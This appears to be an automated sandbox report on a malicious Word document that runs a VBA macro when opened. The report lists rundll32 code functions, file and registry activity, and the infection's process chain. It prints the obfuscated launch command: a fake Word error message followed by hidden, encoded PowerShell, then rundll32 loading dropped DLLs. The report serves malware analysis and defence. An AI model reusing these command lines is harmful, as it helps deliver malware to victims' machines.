Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5478 8_2_001C5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D4478 8_2_001D4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CE272 8_2_001CE272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D9665 8_2_001D9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C9A99 8_2_001C9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D34BF 8_2_001D34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D90BE 8_2_001D90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CB6B9 8_2_001CB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2EAC 8_2_001C2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C70AD 8_2_001C70AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C28AA 8_2_001C28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DC4A5 8_2_001DC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C6CA5 8_2_001C6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C92A3 8_2_001C92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CE8DD 8_2_001CE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CB8D8 8_2_001CB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DA6D9 8_2_001DA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D9EDA 8_2_001D9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D08CF 8_2_001D08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D34C3 8_2_001D34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D38C2 8_2_001D38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D14FC 8_2_001D14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D00FE 8_2_001D00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D66FB 8_2_001D66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C50F1 8_2_001C50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C68EC 8_2_001C68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C30E8 8_2_001C30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D891E 8_2_001D891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D2515 8_2_001D2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CB10A 8_2_001CB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C4304 8_2_001C4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DB706 8_2_001DB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DD138 8_2_001DD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D9333 8_2_001D9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D7132 8_2_001D7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CFF2C 8_2_001CFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CEF2E 8_2_001CEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CF52E 8_2_001CF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D3D29 8_2_001D3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C3523 8_2_001C3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CA323 8_2_001CA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D6158 8_2_001D6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DC15B 8_2_001DC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CEB54 8_2_001CEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2353 8_2_001C2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C4D48 8_2_001C4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C177C 8_2_001C177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D2179 8_2_001D2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C0D7A 8_2_001C0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C2B70 8_2_001C2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D1372 8_2_001D1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DB165 8_2_001DB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C5D63 8_2_001C5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D819F 8_2_001D819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C9D95 8_2_001C9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CF797 8_2_001CF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CF793 8_2_001CF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C498C 8_2_001C498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C598B 8_2_001C598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CDB86 8_2_001CDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C1983 8_2_001C1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C3DB8 8_2_001C3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CD5B8 8_2_001CD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D41AB 8_2_001D41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D1BA5 8_2_001D1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D7FA7 8_2_001D7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DC5A1 8_2_001DC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CD3F5 8_2_001CD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C27F3 8_2_001C27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CB3E8 8_2_001CB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CFBE6 8_2_001CFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0202303C 8_2_0202303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_020187D0 8_2_020187D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02031E14 8_2_02031E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B4012 9_2_001B4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AC017 9_2_001AC017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B0604 9_2_001B0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9C3D 9_2_001A9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AC851 9_2_001AC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BCA55 9_2_001BCA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BBC4D 9_2_001BBC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9846 9_2_001A9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A5478 9_2_001A5478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B4478 9_2_001B4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BCC7F 9_2_001BCC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AE272 9_2_001AE272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9665 9_2_001B9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9A99 9_2_001A9A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB6B9 9_2_001AB6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B34BF 9_2_001B34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B90BE 9_2_001B90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A28AA 9_2_001A28AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2EAC 9_2_001A2EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A70AD 9_2_001A70AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A92A3 9_2_001A92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC4A5 9_2_001BC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A6CA5 9_2_001A6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9EDA 9_2_001B9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB8D8 9_2_001AB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BA6D9 9_2_001BA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AE8DD 9_2_001AE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B08CF 9_2_001B08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B34C3 9_2_001B34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B38C2 9_2_001B38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B66FB 9_2_001B66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B00FE 9_2_001B00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B14FC 9_2_001B14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A50F1 9_2_001A50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A30E8 9_2_001A30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A68EC 9_2_001A68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B891E 9_2_001B891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B2515 9_2_001B2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB10A 9_2_001AB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BB706 9_2_001BB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A4304 9_2_001A4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BD138 9_2_001BD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B9333 9_2_001B9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B7132 9_2_001B7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B3D29 9_2_001B3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AEF2E 9_2_001AEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF52E 9_2_001AF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AFF2C 9_2_001AFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A3523 9_2_001A3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AA323 9_2_001AA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC15B 9_2_001BC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B6158 9_2_001B6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2353 9_2_001A2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AEB54 9_2_001AEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A4D48 9_2_001A4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A0D7A 9_2_001A0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B2179 9_2_001B2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A177C 9_2_001A177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B1372 9_2_001B1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A2B70 9_2_001A2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A5D63 9_2_001A5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BB165 9_2_001BB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B819F 9_2_001B819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF793 9_2_001AF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AF797 9_2_001AF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A9D95 9_2_001A9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A598B 9_2_001A598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A498C 9_2_001A498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A1983 9_2_001A1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ADB86 9_2_001ADB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A3DB8 9_2_001A3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AD5B8 9_2_001AD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B41AB 9_2_001B41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001BC5A1 9_2_001BC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B7FA7 9_2_001B7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001B1BA5 9_2_001B1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A27F3 9_2_001A27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AD3F5 9_2_001AD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AB3E8 9_2_001AB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001AFBE6 9_2_001AFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059C851 10_2_0059C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ACA55 10_2_005ACA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ABC4D 10_2_005ABC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599846 10_2_00599846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00595478 10_2_00595478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A4478 10_2_005A4478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005ACC7F 10_2_005ACC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059E272 10_2_0059E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9665 10_2_005A9665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A4012 10_2_005A4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059C017 10_2_0059C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A0604 10_2_005A0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599C3D 10_2_00599C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9EDA 10_2_005A9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B8D8 10_2_0059B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AA6D9 10_2_005AA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059E8DD 10_2_0059E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A08CF 10_2_005A08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A38C2 10_2_005A38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A34C3 10_2_005A34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A66FB 10_2_005A66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A00FE 10_2_005A00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A14FC 10_2_005A14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005950F1 10_2_005950F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005930E8 10_2_005930E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005968EC 10_2_005968EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599A99 10_2_00599A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B6B9 10_2_0059B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A90BE 10_2_005A90BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A34BF 10_2_005A34BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005928AA 10_2_005928AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005970AD 10_2_005970AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592EAC 10_2_00592EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005992A3 10_2_005992A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00596CA5 10_2_00596CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC4A5 10_2_005AC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC15B 10_2_005AC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A6158 10_2_005A6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592353 10_2_00592353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059EB54 10_2_0059EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00594D48 10_2_00594D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00590D7A 10_2_00590D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A2179 10_2_005A2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059177C 10_2_0059177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A1372 10_2_005A1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00592B70 10_2_00592B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00595D63 10_2_00595D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AB165 10_2_005AB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A891E 10_2_005A891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A2515 10_2_005A2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B10A 10_2_0059B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AB706 10_2_005AB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00594304 10_2_00594304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AD138 10_2_005AD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A7132 10_2_005A7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A9333 10_2_005A9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A3D29 10_2_005A3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059FF2C 10_2_0059FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059EF2E 10_2_0059EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F52E 10_2_0059F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00593523 10_2_00593523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059A323 10_2_0059A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005927F3 10_2_005927F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059D3F5 10_2_0059D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059B3E8 10_2_0059B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059FBE6 10_2_0059FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A819F 10_2_005A819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F793 10_2_0059F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00599D95 10_2_00599D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059F797 10_2_0059F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059598B 10_2_0059598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059498C 10_2_0059498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00591983 10_2_00591983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059DB86 10_2_0059DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00593DB8 10_2_00593DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0059D5B8 10_2_0059D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A41AB 10_2_005A41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005AC5A1 10_2_005AC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A7FA7 10_2_005A7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005A1BA5 10_2_005A1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00406417 11_2_00406417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041A0F1 11_2_0041A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00404844 11_2_00404844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040E044 11_2_0040E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00415250 11_2_00415250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00410672 11_2_00410672
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: N00048481397007.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: N00048481397007.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00428000 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0045B890 appears 50 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00439898 appears 50 times
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@38/12@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0048481397007.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBA0B.tmp
Source: N00048481397007.doc OLE indicator, Word Document stream: true
Source: N00048481397007.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: (console buffer without printable text)
Source: C:\Windows\System32\msg.exe Console Write: Async message sent to session Console
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: es are "Ssl3, Tls". (tail of the .NET enumeration error 'Possible enumeration values are "Ssl3, Tls"'; the PowerShell host in this run sits on .NET 2.0, whose System.Net.SecurityProtocolType has no Tls11/Tls12 members)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: h{}}$J82E=('W'+('28'+'L')) (fragment of the -enc script, most likely echoed by the PowerShell error position report; note the ('W'+('28'+'L')) string-concatenation obfuscation)
(76 further Console Write calls by powershell.exe held no printable text and are not listed individually)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (opened by each of the 14 rundll32.exe instances; the Delphi runtime reads this key at start-up to locate localized resource modules, so it marks the loaded module as Delphi-compiled code rather than being an Emotet-specific indicator)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: N00048481397007.doc Virustotal: Detection: 16%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
